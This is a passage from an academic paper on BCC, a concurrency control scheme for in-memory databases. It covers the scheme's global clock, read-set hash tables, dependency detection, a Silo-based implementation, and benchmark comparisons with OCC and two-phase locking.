BCC examines two data dependencies to detect the essential patterns. Theoretically, examining more dependencies can further reduce false aborts. However, the overheads will increase significantly. If detecting more dependencies, the dependencies can happen not only between concurrent transactions, but also between an active transaction and previously committed transactions that were concurrent with other active transactions. This makes the cost of checking dependency increase exponentially. Even disk-based
databases (e.g. PostgreSQL) avoid considering more than two dependencies [26] because of the high overhead [24].
3. AN OPTIMIZED BCC METHOD
In-memory databases can execute transactions as snapshot transactions. In some state of the art in-memory databases, such as [30, 31], read-only transactions are executed as snapshot transactions while write transactions are not. There are two reasons for this design. First, read-only transactions may be continuously aborted when running with other write transactions. Running them as snapshot transactions guarantees that they will never be aborted, although they may read stale data. Second, write transactions dominate the transactions executed by the database. Running them as snapshot transactions could introduce expensive operations like acquiring latches and locks for read operations in some concurrency control kernels, which will degrade the database’s performance and scalability when the database has strived to avoid all centralized hotspots and scalability bottlenecks.
The BCC method requires the database to maintain a history of anti-dependency information to detect the essential pattern shown in Figure 2(d). If this is naively implemented, it can add a centralized hot spot to the in-memory database kernel and hurt BCC’s scalability. The overhead is caused by the fact that when a transaction T1 is a snapshot transaction, the dependency T1 → T2 may not exist when T2 commits. In this case, to avoid BCC’s overhead of maintaining historical dependency information, the database must guarantee that read-only snapshot transactions may never appear in any essential pattern.
Existing in-memory OCC databases avoid validating the snapshot transaction by taking an early snapshot time. However, this does not work in BCC. The reason is that the dependency cycle that is shown in Figure 2(d) can be created, with transaction T1 being the snapshot transaction, no matter when the snapshot is taken. Based on BCC’s validation criteria, both transactions T2 and T3 would be allowed to commit because no essential patterns are detected. To guarantee serializability, the database has to validate the snapshot transaction T1, detect the essential pattern, and abort T1.
We solve the problem by adding a light-weight synchronization point for snapshot transactions. The idea is that when a new read-only snapshot transaction begins, the database doesn’t immediately start executing the snapshot transaction. Instead, it waits until all the active transactions are finished. During this period, no new transactions will be executed. After all active transactions have finished, the database takes a snapshot for the snapshot transaction and resumes executing transactions as normal.
With the above snapshot mechanism, a read-only snapshot transaction cannot become part of the essential patterns. This can be proved by contradiction. Assume that a read-only snapshot transaction could be part of the essential patterns. Since the snapshot transaction doesn’t write any tuple, it cannot be T3 in the essential patterns. Let the snapshot transaction be T2. Then the essential pattern would be T1 → T2 → T3. In this case, T3 must commit before T2 takes the snapshot, and T3 must commit after T2 takes the snapshot. This means T1 commits earlier than T3, which contradicts with the fact that T3 is the first committed transaction in the dependency cycle. Let the snapshot transaction be T3. Then essential pattern would be T1 → T2 → T3 → T3. The snapshot transaction can only be wr dependent on another transaction to form a cycle. Let the transaction that T3 is wr dependent on be T0. T0 must commit before T3 starts. With our snapshot mechanism, T2 and T3 cannot start earlier than T1. Thus T0 must commit earlier than T3, which contradicts with the fact that T3 is the first committed transaction in the dependency cycle.
In this case, the database only needs to validate if a transaction can become the essential pattern’s T2 to guarantee serializability. The overhead of maintaining history anti-dependency information is avoided. Moreover, there is no need to maintain the read set of read-only snapshot transaction and validate it.
This optimization technique targets long-running read-only transactions where a short execution delay is acceptable. Users can always choose to revert to the original BCC protocol (and accept the additional overhead) if slight latency degradation is unacceptable.
4. DETAILED BCC IMPLEMENTATION
To support BCC in the database, two components must be implemented. One is a global clock to help detect data dependencies between concurrent transactions, the other is efficient management of the tuples accessed by each transaction. These two components are introduced in Section 4.1 and Section 4.2, respectively. Section 4.3 presents how to detect data dependency and Section 4.4 discusses phantom problems. In the last part of the section we explain how a BCC database executes transactions.
4.1 Global Clock
BCC needs a global clock to help decide if a data dependency should be considered as part of the essential pattern.
Our design of the global clock relies on the following in-memory database’s features. First, to achieve good scalability, in-memory databases generate Transaction IDs (TIDs) in a decentralized way. For example, in Silo [30], which is a representative in-memory database, each TID can be divided into three parts: (1) thread index, which denotes the database thread that generated the TID; (2) the value of the database thread’s local counter; and (3) the value of global epoch, which is a slowly advanced global timestamp in the database. A database thread can generate a TID by reading its local counter and the global epoch without synchronizations. One important property of the TIDs is that TIDs generated by the same database thread increase monotonically. However, this property doesn’t hold for TIDs generated by different database threads. Second, each tuple in the database has an associated metadata recording the TID of the latest transaction that has written the tuple.
The global clock is designed as a global TID vector. The number of entries in the vector is the same as the number of available threads in the database. Each thread has a corresponding entry in the global clock, which records the thread’s most recently assigned TID. A database thread must update its entry in the global clock every time it assigns a new TID.
The database can determine the order of a global clock value and a TID in two steps. The database first finds the database thread that generated the TID. Then it compares the value in the thread’s global clock entry with the TID. The one with a smaller value happened first. The comparison process is shown in Figure 3.
Figure 3: Comparison between the global clock and a tuple’s TID.
The global clock is used in data dependency detections, which will be described in Section 4.3.
4.2 Transaction Data Management
BCC requires the database to keep track of each transaction’s read set and write set to detect data dependencies. In the validation phase, the database checks if the transaction’s read set has been changed and if the transaction’s write set overlaps with other concurrent transactions’ read sets. In this case, the transaction’s write set can be simply kept in the database thread’s local storage and will be released when the transaction finishes. On the other hand, the transaction’s read set must be stored in the shared memory. Next we discuss how to efficiently manage the read sets.
Organization. We use hash table to organize the read set, since it may be searched by multiple database threads. A common approach is to use a shared hash table to store the tuples read by each transaction, but it requires synchronizations when accessing the hash table. For example, if two transactions read the same tuple, they will modify the same entry in the hash table, which must be synchronized. To ease the synchronization overhead, instead of maintaining one shared hash table across the database, each database thread maintains a separate hash table for each transaction. Each entry in the hash table contains a pointer to a tuple and the tuple’s TID. A transaction’s hash table must be kept in the memory until the transaction’s concurrent peers have finished. Hash tables allocated by the same database thread are organized into a history list. Each entry in the list is a triple \(<TID, Address, Release>\), where \(TID\) specifies which transaction the hash table belongs to; \(Address\) records the hash table’s starting memory address; and \(Release\) determines when the hash table can be released.
Allocation and release. A database thread allocates a hash table when it starts a transaction \(T\). It also allocates an entry in the history list to store the hash table’s memory address and \(T\)’s TID.
The hash table’s \(Release\) is set with the maximum TID in the global clock after \(T\) finishes. In this way, any transaction that has a larger TID than \(Release\) of \(T\)’s hash table must start after \(T\) finishes and is not concurrent with \(T\).
To release \(T\)’s hash table, the database thread must guarantee that all \(T\)’s concurrent transactions have finished. This can be determined by checking if the minimum TID in the global clock is larger than the hash table’s \(Release\). If minimum TID in the global clock is larger, all the active transactions in the database must start after \(T\) finishes. The hash table can be safely released.
The release mechanism is conservative. A transaction \(T\)’s hash table is not immediately released after \(T\)’s concurrent transactions have finished. But it guarantees safe release of each hash table without synchronizations.
Synchronizations. Since a hash table can only be modified by one database thread and is not released until all concurrent transactions have finished, the only scenario that needs synchronization is while a thread is inserting into the hash table; another one is searching the hash table for \(rw\) dependency (i.e. \(T_1 \rightarrow rw \rightarrow T_2\)). Without synchronization, an actually happened \(rw\) dependency may not be detected by the searching thread, which can cause serializability problem. Protecting the hash table with latch can solve the problem, but it harms scalability thus we avoid it.
We solve the problem by verifying the tuple after inserting it into the hash table. If any change has happened, a \(rw\) dependency may not be detected. Thus the database thread must discard the old tuple and re-read the tuple. This guarantees that either the \(rw\) dependency can be detected later, or the thread will read the newest tuple. The synchronization process is shown in Algorithm 2.
Algorithm 2 Hash table synchronization
1: read a tuple from database;
2: insert the tuple into the hash table;
3: while true do
4: read the same tuple from database;
5: if tuple has changed after inserting into the hash table then
6: discard the old tuple from hash table;
7: insert the new tuple into the hash table;
8: else
9: break;
10: end if
11: end while
Garbage collection. In the BCC database, a transaction \(T\)’s hash table is kept in the database until \(T\)’s concurrent transactions have finished. It is possible that some tuples that stored in \(T\)’s hash table have been garbage collected by the database when a database thread searches \(T\)’s hash table. This does not cause any problem because the hash table contains sufficient information (tuple’s address and tuple’s TID) to detect the data dependency. The search thread only needs to check if the tuple is in the hash table. There is no need to access the content of the tuple.
4.3 Data Dependency Detection
Detect anti-dependency. The anti-dependency is detected with OCC’s criterion by checking whether T’s read set has been changed.
Detect \(wr\) and \(ww\) dependencies. The database thread first takes a snapshot of the global clock when \(T\) starts and stores the value as \(Start\) in \(T\)’s local memory. To detect \(wr\), every time \(T\) reads a tuple \(^1\), the thread compares the tuple’s TID with \(Start\) to decide if TID is generated after \(Start\). If TID is generated later than \(Start\), \(wr\) has happened. The \(ww\) dependency is detected after \(T\) enters the validation phase in a similar way. If any tuple in the transaction’s write set has a TID that is generated later than \(Start\), \(ww\) has happened.
Detect \(rw\) dependency. The database thread first takes a snapshot of the global clock when \(T\) starts and stores the value as \(Start\) in \(T\)’s local memory. The thread takes another snapshot of the global clock after \(T\) enters the validation phase and stores the value as \(End\) in \(T\)’s local memory. \(Start\) and \(End\) define the TID range of the concurrent transactions that \(T\) may be \(rw\) dependent on.
With \(Start\) and \(End\), the database thread simply goes through other thread’s history lists and check if \(T\)’s write set overlaps with any hash table whose TID is generated later than \(Start\) but earlier than \(End\). If there is overlap, \(rw\) has happened.
Since taking the snapshot of the global clock doesn’t need synchronizations, it is possible that while the thread is taking the second snapshot, new transactions have started. These transactions may not be considered as concurrent with \(T\). This will not cause any problem. The reason is that these new transactions cannot read the tuples in \(T\)’s write set since \(T\) is in the critical section. Thus \(T\) cannot be \(rw\) dependent on them.
4.4 Phantom
Phantom problem can happen when a transaction is executing a range query while a concurrent transaction inserts a new tuple into the range. In the essential patterns, phantom can happen in two cases: (1) \(T_2\) is the read transaction and \(T_3\) is the insert transaction and (2) \(T_1\) is the read transaction and \(T_2\) is the insert transaction. The BCC database avoids phantom in the same way as recent in-memory OCC database (e.g. [30, 31]) does, which will abort the
\(^1\) The delete operation only marks a tuple as deleted without removing the tuple for snapshot transactions.
read transaction if phantom happens. In the first case, phantom will be detected in the validation of $T_2$ and $T_2$ will be aborted. In the second case, there is no need to detect $T_1 \xrightarrow{rw} T_2$ in the validation of $T_2$ since $T_1$ will be aborted when validating $T_1$.
4.5 Put Together: A Transaction’s Life
Algorithm 3 How a BCC database works in different phases
1: Transaction Start:
2: assign a TID and update the global clock;
3: take a snapshot of the global clock;
4: allocate a new hash table and release history hash tables;
5: Transaction Validation:
6: enter the critical section;
7: take a snapshot of the global clock;
8: if there exists left_conlict = right_conlict = 0;
9: right_conlict = 1;
10: find concurrent transactions;
11: if $T$ is dependent on its concurrent transactions
12: then
13: left_conlict=1;
14: end if
15: end if
16: if right_conlict = 1 and left_conlict = 1
17: set the Release field of the transaction’s hash table;
18: abort the transaction;
19: else
20: install the writes and commit the transaction;
21: end if
22: leave the critical section;
With the above designs, we now illustrate how a BCC database works in different transaction execution phases. The process is shown in Algorithm 3.
When a transaction $T$ starts, the database first assigns $T$ a new TID and updates the corresponding entry in the global clock. Then the database takes a snapshot shot of the global clock, which serves as multiple purposes. First, it is used to help determine the concurrent transactions for the later validation. Second, it is used to set the Release field of previous transaction’s hash table with the maximum TID value in the global clock. Third, it is used to release unused history hash tables by finding the minimum TID in the global clock and releasing all hash tables whose Release are smaller than the minimum TID. The database also allocates a new hash table for the transaction.
When the transaction enters the validation phase, the database first takes a snapshot of the global clock, which can be used together with the clock taken in line 3 to determine concurrent transactions. Then the database checks if $T$ is anti-dependent on any committed transaction. If no anti-dependency exist, $T$ will be committed since no essential pattern will be created. Otherwise the database checks if $T$ is dependent on any of its concurrent transactions. This requires the database to find all the transactions that are concurrent with $T$ and check data dependencies between them. The data dependency is checked in the order of $wr$, $ww$ and $rw$. If any data dependency is detected, the transaction will be aborted. The database will also set the Release of the aborted transaction’s hash table such that the hash table can be immediately released. Otherwise the transaction will be committed.
5. EXPERIMENTAL METHOD
To evaluate BCC’s effectiveness, we have implemented BCC and two phase locking (2PL) in Silo [30], which is a multi-threaded, shared in-memory OCC database. Silo generates TIDs in a decentralized way. It maintains a thread-local read-set and write-set for each transaction. Tuples in the transaction’s write set are locked in a deterministic order before validation starts. After that, Silo assigns a TID to the transaction if the transaction writes to the database and validates the transaction using OCC’s criterion.
5.1 Silo With BCC
Multi-Level Circular Buffers. Each thread in BCC database requires a memory space to store history hash tables, which may be allocated, released, and checked frequently. It is necessary to manage this memory space efficiently.
One way to manage the space is to organize it as a single region and use a free list to record the memory blocks available for new allocations. However, this approach would incur serious cache misses when each newly allocated hash table is filled with read sets. This problem can be addressed by utilizing two special characteristics of BCC thread’s memory operations: (1) the hash tables are always released in the same order as they are allocated; (2) the memory demand of each thread for storing history hash tables is usually low, and only occasionally jitters to its maximum requirement (Section 6.3).
In our implementation, each thread partitions its memory space into three smaller areas that are managed with three levels of circular buffers. The lowest-level circular buffer is the smallest and can fit into the L1 CPU cache; the next one is slightly larger but is smaller than the L2 cache; the highest-level buffer is the largest one and can be any size that satisfies the maximum memory requirement of a thread. The database thread always tries to allocate memory from a lower-level circular buffer, and only resorts to a higher one when the lower buffer space becomes depleted. In each circular buffer, the memory is always allocated and released in a chase-tail fashion. Since most OLTP transactions are short and the average memory requirement of each database thread is low, this design ensures that most hash table operations can be satisfied in the L1 or L2 (or even L3) CPU cache.
Global clock. We implement the global clock as a set of sub-vectors. The number of sub-vectors equals to the number of CPU sockets and each sub-vector is a continuous array aligned on a single cache line on each socket.
TID generation. We use Silo’s distributed TID generator to generate TIDs for every transaction. The original Silo only assigns TIDs to transactions that write to the database. We modify the TID generator such that every transaction will be assigned a TID. Every time a database thread generates a TID, it will update its entry in the global clock. For each database thread, we use the last TID generated by the thread to identify the current transaction’s hash table since Silo generates TIDs in the validation phase.
Snapshot transactions. We add a synchronization point in the database before a snapshot transaction begins. After the synchronization, the database first advances the global epoch and then starts executing transactions. The snapshot is created based on the current Epoch value. Only tuples written in the previous Epoch can be read by the snapshot transactions.
5.2 Silo With 2PL
Our 2PL implementation is motivated by [25]. We avoid the centralized lock manager which generates suboptimal performance. Instead, we implement the per-tuple lock, and associate each tuple with a shared read lock and an exclusive write lock. No lock lists
are used. To avoid the deadlock detection overhead, we adopt the wait-die 2PL mechanism [27]. A global timestamp allocator, which is implemented as an atomic variable, assigns timestamp to each transaction to differentiate the precedence of transactions.
5.3 Experimental Setup
All experiments are conducted on a 32-core machine with four 2.13GHz Intel Xeon E7-8830 CPUs and 128GB memory. Hyper-threading is disabled to yield the best base performance of Silo [30]. The operating system is 64-bit Linux with 2.6.32 kernel. The version of GCC compiler is 4.8.2.
To avoid stalls due to user interaction, no network clients are involved in our experiments. Each database thread runs on a dedicated CPU core and has a local workload generator to generate input transactions for itself. Database logging is also disabled. All table data are resident in main memory and no disk activities are involved during each measurement. For each measurement, we run the experiment for 10 times, each lasting for 30 seconds, and the median results are reported.
6. EXPERIMENT RESULTS
In this section we present the performance results of BCC, OCC, and 2PL based on the prototype implementation in Silo. The experiment results confirm our expectations for BCC performance as follows:
- **BCC achieves comparable performance and scalability with OCC when the workload contention is low** (Section 6.1).
- **BCC significantly improves transaction throughput for high-contention workloads**: BCC improves the throughput by 3.68x over OCC and by 2x over 2PL (Section 6.2).
- **BCC’s overhead on memory consumption and increased transaction latency is acceptable** (Section 6.3).
The performance results demonstrate BCC’s usefulness in practice, which can provide good performance in both low contention and high contention scenarios.
6.1 Low Contention
We first evaluate how BCC performs when data contention is low. TPC-C [1] and YCSB [7] benchmarks are used in the experiments. Due to limited space, we only present TPC-C’s results here. YCSB’s results are similar.
TPC-C. TPC-C is an industry-standard benchmark for evaluating transaction database performance. It models the operations in a wholesale store that consists of a number of warehouses. In the Silo implementation, TPC-C tables are partitioned across the warehouses. We set the number of warehouses (i.e., the scale factor) to be the same with the number of database threads. In this configuration, each thread will mostly operate on the data items in its own warehouse, which makes the chance of data contention rare.
Figure 4 shows the transaction throughputs achieved by BCC, OCC and 2PL as the number of threads increases. As can be seen from the figure, BCC performs comparably and scales near-linearly as OCC does for the TPC-C workload. When there are 32 threads, BCC delivers an overall throughput of 1.15M transactions per second, which is only 7.29% lower than that achieved by OCC (1.24M). Despite the extra operations introduced by BCC for detecting the essential patterns, inter-core communication induced for checking history hash tables is rare when there are few data contentions. This makes BCC’s overhead low, retaining OCC’s performance benefits for low-contention workloads.
To better understand the causes of BCC’s slight overhead compared to OCC, we further break down the slowdown of BCC at 32 threads and show how different kinds of operations in BCC contribute to the throughput degradation. The result is listed in Table 1. It can be seen that the overhead mainly comes from two sources: memory management (Mm), which lowers the throughput by a delta of 4.76%, and accessing global clocks (Clock), which contributes 2.42% to the performance degradation. When the data contention is low, memory management operations mainly include bookkeeping the history list, and allocating and releasing memory for history hash tables. In our implementation each database thread uses a small memory region residing on local NUMA node to store the history list and hash tables. In this case no inter-core communication is needed for memory management operations. Since most OLTP transactions are short, the overhead due to memory management should remain almost constant regardless of the number of cores on the target platform.
On the other hand, the overhead of accessing the global clock is affected by the number of sockets on the machine. This is because the global clock in BCC is implemented as a distributed vector spread among the sockets. Each database thread needs to read all the distributed vectors at the beginning of a transaction, incurring inter-socket communication. This overhead is mainly determined by the number of sockets in the machine. However, since the number of sockets in a system is typically small, we believe this overhead (only 2.42% with 4 sockets) is acceptable in practice.
Compared to 2PL, BCC achieves better performance and scalability. With 32 threads, 2PL only delivers a throughput of 0.92M transactions per second, which is 19.9% and 25.8% lower than BCC and OCC respectively. In general, 2PL introduces extra overheads in two aspects. First, 2PL incurs extra locking operations for read operations compared to BCC and OCC. Each read operation needs to acquire and release a latch-protected read lock. Second, 2PL needs a centralized timestamp allocator to accurately determine the order of transactions to avoid deadlock, which becomes a bottleneck with the increase of number of the threads.
6.2 High Contention
This section compares the performance of BCC with OCC and 2PL when data contention is high. A modified TPC-W [2], TPC-C
and YCSB [7] are used in the evaluation.
TPC-W, TPC-W is a popular OLTP benchmark simulating the operations of an online bookseller. Compared with TPC-C, TPC-W has more complex read-only transactions. Since read-only transactions are executed as snapshot transactions which Silo never aborts with either OCC or BCC, their performance is similar under both concurrency control methods. We thus exclude them from our experiments with TPC-W, otherwise they would dominate the measured system throughput.
We experiment with the two update-intensive transactions from the TPC-W benchmark: (1) DoCart adds a set of random items to the shopping cart and displays the cart; (2) OrderProcess processes a set of random orders and updates the database (e.g., updating the stock numbers of the ordered items). To simulate the high contention scenario, we use slightly modified versions of the two transactions: there is one hot item in the orders processed by each OrderProcess transaction, and each DoCart transaction has a certain probability to display the hot item. In all our experiments, we let one database thread execute the OrderProcess transactions, while all other threads execute the DoCart transaction.
In our first experiment, we evaluate the performance of BCC, OCC and 2PL when the DoCart transaction has the highest contention probability with the OrderProcess transaction. We set the probability of DoCart adding the hot item to 100%, and measure transaction throughputs as the number of threads varies. The result is presented in Figure 5.
It can be seen that BCC scales much better than OCC in this experiment. As the number of threads increases, BCC gains increasingly higher performance advantage. With 32 threads, BCC achieves a throughput of 1.03M transactions per second, which is 3.68x over the throughput with OCC (0.28M).
The performance improvement achieved by BCC over OCC is mainly attributed to the reduction of false-aborted DoCart transactions. We can understand this conclusion from the following observations. First, there can be no data dependencies between two DoCart transactions because each DoCart only modifies its own private shopping cart. Second, the hot item displayed (read) by a DoCart transaction has a high probability of having been modified by an OrderProcess transaction when the DoCart transaction tries to commit. In this case, OCC must abort the DoCart transaction due to the appearance of a anti-dependency on a committed transaction. However, it is actually unlikely that a data dependency cycle would form because the rest tuple accesses in both DoCart and OrderProcess are random, making it a false abort to abort the DoCart transaction. BCC effectively reduces such false aborts by checking for one more data dependency besides the anti-dependency.
2PL performs differently. As can be seen, 2PL’s throughput goes through three stages: decrease-increase-decrease. When using 2PL, OrderProcess’s throughput decreases as the number of threads increases because the hot tuple is more likely to be read locked by DoCart, which blocks OrderProcess. The reason for the decrease of 2PL’s throughput when the number of threads increases from 1 to 2 is that the decrease throughput of OrderProcess is larger than the added throughput of DoCart. Note that 2PL’s throughput with one database thread is OrderProcess’s throughput. As the number of threads increases from 2 to 16, 2PL’s throughput increases. The reason is that DoCart’s throughput has increased and it outweighs the decrease of OrderProcess’s throughput. As the number of threads further increases, both DoCart’s throughput and OrderProcess’s throughput decrease because of the high contention. Thus 2PL’s throughput decreases.
Compared to 2PL, BCC doesn’t perform as well as 2PL when the number of threads is 4 or less. However, as the number of threads increases, BCC significantly outperforms 2PL. With 32 threads, the throughput of BCC is 2.03x over that of 2PL (0.5M). The performance differences are mainly determined by the relationship between 2PL’s synchronization overhead and BCC’s overhead of detecting essential patterns. With 2PL, the workloads are dominated by DoCart transactions when the number of threads is 32. 2PL has to synchronize between different threads because each one tries to add a read-lock to the hot tuple. In an optimized in-memory database, the synchronization cost is non-trivial. On the other hand, BCC’s validation doesn’t incur synchronizations for read contention.
The above experiment demonstrates how BCC performs under the highest intensity of per-thread contention. To understand how different contention intensity affects the transaction throughput, we fix the number of threads to 32 and vary the probability that DoCart adds the hot item to shopping cart. When the probability is 100%, it is the same with the previous experiment at 32 threads and the contention reaches the highest. When the probability is 0%, all items in a DoCart transaction are randomly chosen and the contention is the lowest. The result is shown in Figure 6.
Compared to OCC, BCC performs slightly lower when the contention probability is less than 10%, (by up to 7.95%) due to the overhead of shared memory management and inter-socket communication incurred by accessing the global clock. With the increase of contention probability, the throughput of OCC drops sharply, bottoming at only 285k transactions per second when the probability reaches 100%. On the other hand, BCC’s throughput decreases at a much slower rate. When the contention probability is 20% or greater, BCC’s benefit of reducing false aborts outweighs its overhead for detecting the essential patterns, which improves the overall throughput.
We can see that 2PL has a similar performance trend with OCC,
although 2PL performs better than OCC. When the contention probability is less than 40%, 2PL has comparable performance with BCC. However, as the contention probability continuously increases, the performance of 2PL decreases much faster as that of BCC. This is because of 2PL’s higher synchronization cost as we have discussed previously.
**TPC-C.** In the TPC-C experiments we use the update-intensive transactions, *NewOrder* and *Payment*, which comprises of most transactions in the TPC-C benchmark. We set the scale factor of TPC-C to 2 and the workload mix executed by each thread to {50%, 50%}. Figure 7 shows the throughput of this TPC-C workload as we increase the number of threads.

It can be seen that BCC outperforms OCC when the number of threads exceeds the number of warehouses. With up to 16 threads, the throughput of BCC and OCC both increase with the increase of thread number, but BCC scales better than OCC. BCC improves the throughput by 37% over OCC with 16 threads. As the number of threads further increases beyond 16 threads, the performance of both BCC and OCC start degrading with similar trends, but BCC still maintains good performance improvement (up to 35.8%) above OCC. This again confirms BCC’s advantage over OCC through reducing false aborts.
The transactions *NewOrder* and *Payment* in TPC-C have much more complex data dependency patterns than the transactions *DocCart* and *OrderProcess* in TPC-W do. When operating on the same warehouse, all types of data dependencies can happen between any two concurrent transactions, each of which can be either *NewOrder* or *Payment*. Thus it is possible that a cycle would be created in the transaction dependency graph. For example, when two threads are executing the *Payment* transactions on the same warehouse, they both need to read and update the year-to-date payment, a dependency cycle containing *rw* and *wr* dependencies would likely be formed and thus one of the *Payment* transaction will be aborted by both BCC and OCC. This explains the performance decrease of both BCC and OCC when the contention becomes severe (with more than 16 threads).
BCC also performs better than 2PL. The throughput is improved by up to 1.84x. The poor performance of 2PL is mainly caused by its high synchronization overhead and the lock thrashing behavior. For example, when multiple database threads are executing *Payment* on the same warehouse, they need to acquire both read lock and write lock on the contented tuple. It is likely that the tuple is read locked by multiple threads thus only one thread can wait for the write lock while the rest are aborted. These aborted transactions cause unnecessary synchronization for others which limits the number of transactions processed to the database. We observe that with 32 threads, the total number of transaction throughput processed by 2PL (including both committed and aborted transactions) is 0.31M per second, which is significantly lower than that of BCC (0.9M).

To better understand BCC’s performance improvement over OCC and 2PL on TPC-C, we break down the overall throughput by the numbers contributed by different transaction types. The results are shown in Figure 8.
OCC, BCC and 2PL perform differently for *NewOrder* and *Payment*. OCC favors *Payment* transactions over *NewOrder* transactions while 2PL commits much more *NewOrder* transactions than *Payment* transactions. BCC’s performance for *NewOrder* and *Payment* lie between.
Compared to OCC, BCC’s performance advantage comes from the improved throughput of the *NewOrder* transaction. The reason is that many of the *rw* dependencies that happen between *NewOrder* and *Payment* that do not actually form a dependency circle, thus suffering false aborts with OCC. Examining additional dependency can greatly avoid the aborts and thus improve the overall throughput. However, OCC cannot improve the throughput of *Payment* transactions. It performs even worse than OCC. This is because each OCC-aborted *Payment* transaction is likely to reside in a dependency cycle with another transaction of the same type (i.e., true abort). Therefore the OCC-aborted *Payment* transactions will also be aborted by BCC. In this case, BCC’s effort of examining additional dependencies only increases transaction execution latency, which in turn degrades the overall throughput.
On the other hand, BCC outperforms 2PL because it performs much better on the *Payment* transactions. With 32 threads, 2PL can barely commit *Payment* transactions. 2PL’s poor performance on *Payment* is caused by the following two reasons. First, there is read write contention between *NewOrder* and *Payment* when they operate on the same warehouse. When the contended tuple is read locked by a *NewOrder* transaction, other *NewOrder* transactions can continue adding read locks to the tuple while *Payment* transaction has to wait. In this case, *Payment* transaction is likely to be aborted to avoid deadlock. Second, the contention two *Payment* transactions on the same warehouse cause aborts of the *Payment* transactions because they create dependency cycle.
**YCSB.** YCSB (Yahoo Cloud Serving Benchmark) benchmark [7] models the workload generated from online key-value and cloud serving stores. The benchmark contains a single table with ten String columns and populated with one million data items. Each transaction randomly accesses 16 tuples with each one having a 20% probability of being an update. Accesses to the tuples follow a Zipfian distribution. We set the conflict factor $\theta$ to 100 to make the level of data contention high. In this case, all types of data de-
pencies can happen between two transactions. The results are shown in Figure 9.
As can be seen from Figure 9, BCC performs better than both OCC and 2PL when the number of thread is 8 or greater. With 32 threads, BCC’s throughput is 1.99x over that of OCC and 1.63x over that of 2PL. The reason for the different performance behaviors is similar to the previous high contention benchmarks. BCC’s performance improvement over OCC comes from BCC’s reduction of unnecessary transaction aborts. On the other hand, BCC outperforms 2PL because of 2PL’s high synchronization cost and lock thrashing behaviors.
6.3 Memory Consumption and Latency
BCC improves transaction throughput through detecting the essential patterns, with shared memory usage and extra operations. In this part we illustrate BCC’s memory consumption and its impact on transaction latency.
Memory Consumption. With BCC, each thread maintains a memory area to store (1) a list of entries for recent history transactions, and (2) the hash tables of these transactions needed for detecting the essential patterns.
The size of saved history hash tables determines the memory consumption of BCC. For a given workload with a fixed number of threads, this overhead is usually stably low. Figure 10 shows the average and maximum sizes of memory occupied by history hash tables in each thread, executing the TPC-C NewOrder and Payment workload mix used in the previous subsection. It can be seen that the average per-thread memory consumption stays below 56KB consistently across all thread counts, with the maximum memory usage not exceeding 1.6MB. The high variance of the memory consumption between the average and the maximum is caused by the conservative hash table release mechanism, which achieves good performance but relies on the process of all database threads to determine when a hash table can be released. When a transaction T’s hash table is released, T’s concurrent transactions may have already finished for some time. Similar results are observed with other workloads used in our experiments as well.
In our experiments we set the number of entries in the history hash tables to 16K and the total size of memory for storing history hash tables to 4MB, which are more than enough for all the workloads encountered in our experiments. This amounts the total memory consumption of BCC with each thread to about 4.38MB, which is negligible compared with the tens of hundreds of gigabytes of memory present on a typical enterprise server. This also justifies BCC’s design of using one hash table per transaction for the benefit of performance with low-contention workloads.
Latency. To illustrate how BCC affects transaction execution latency, we divide the NewOrder transactions processed with BCC in the previous experiment into the following three categories: (1) transactions that are committed with OCC’s validation criterion; (2) transactions that are aborted even after BCC checks; and (3) transactions that are aborted with OCC but committed with BCC. These three types of transactions do not overlap.
For the first type of transactions, BCC’s overhead mainly includes memory management and accessing the global clock, which are similar as the low contention workloads we discussed earlier in Section 6.1. For the second type of transactions, they are aborted by both OCC and BCC. Besides memory management and global clock operations, BCC performs extra data dependency checking before aborting a transaction. Figure 11 shows the total latency of each aborted NewOrder transaction in this case. BCC increases the latency by up to 26% with 32 threads. However, since the database needs to cleanup an aborted transaction for re-execution, this makes BCC’s overhead negligible.
For the third type of transactions, BCC commits a transaction that would otherwise be aborted by OCC (i.e., BCC saves a transaction). This comes at the overhead of increased latency because the database thread needs to validate the transaction’s write set with the history hash tables on other threads. Figure 12 shows the latency of transactions in this type, compared with transactions that OCC commits. As can be seen, the latency of transaction saved by BCC is almost twice as that committed by OCC. However, this overhead is acceptable for two main reasons. First, in high contention scenario, an OCC-aborted transaction may be aborted several times before it can actually commit. Considering the high cost of transaction re-executions, the latency of BCC-saved transactions is often justified. Second, the increased latency is still within tens of microseconds, which is sufficiently small for most real-world applica-
7. RELATED WORK
Partial dependency detection. The idea of detecting partial graph cycles to guarantee serializability was first proposed in the snapshot isolation concurrency control method [5, 11]. Snapshot isolation (SI) has been implemented in major database systems, such as Oracle and PostgreSQL. SI guarantees that read and write transactions won’t block each other to increase system throughput. However, Fekete et al. [12] showed that SI could not guarantee transaction serializability, and Fekete et al. [11] further found a data dependency pattern (dangerous structure) that will always happen when transactions cannot be serialized in snapshot isolation (SI). Cahill et al. [5] demonstrated how to implement the dangerous structure in Berkeley DB. Ports et al. [24] further optimized this method for PostgreSQL. Han et al. [14] further optimized SI for multicore systems. BCC’s essential patterns contain different data dependencies compared to the dangerous structure, which is caused by different record visibilities between SI and the optimistic concurrency control model. In SI a transaction cannot see writes which happen after the transaction starts. However, in BCC, any data dependency may exist between concurrent transactions. Moreover, BCC is designed and optimized for the short latencies that are encountered in main-memory OLTP workloads and not for disk-based implementations.
OCC for in-memory databases. The optimistic concurrency control (OCC) method was originally proposed by Kung and Robinson [17] and has been implemented in recent in-memory databases [18, 30, 31, 32]. These works mainly study how to efficiently implement the OCC method in in-memory databases. Larson et al. [18] proposed OCC for Microsoft SQL Server’s in-memory OLTP engine “Hekaton” [8] and compared the performance of OCC with two-phase locking. Their implementation of OCC used a centralized timestamp allocator. Silo [30] introduced an implementation of OCC without centralized bottlenecks which can achieve near-linear scalability for low contention workloads. Tran et al. [29] studied transaction behaviors on hardware transactional memory. Wang et al. [31] explored how to build high performance OCC for in-memory databases with hardware transactional memory. Yu et al. [32] studied the scalability of different concurrency control methods on up to 1024 cores with a simulator. Despite the implementation differences among these databases, their OCC-based nature unavoidably causes spurious false aborts.
OCC for distributed systems. Recently OCC has also been studied in distributed systems. Maat [19] re-designed OCC for distributed systems and removed the need of locking during two-phase commit. ROCOCO [20] broke transactions into atomic pieces and executed them out of order by tracking dependencies, which significantly outperformed OCC. In comparison, BCC focuses on transaction execution for single-node in-memory databases.
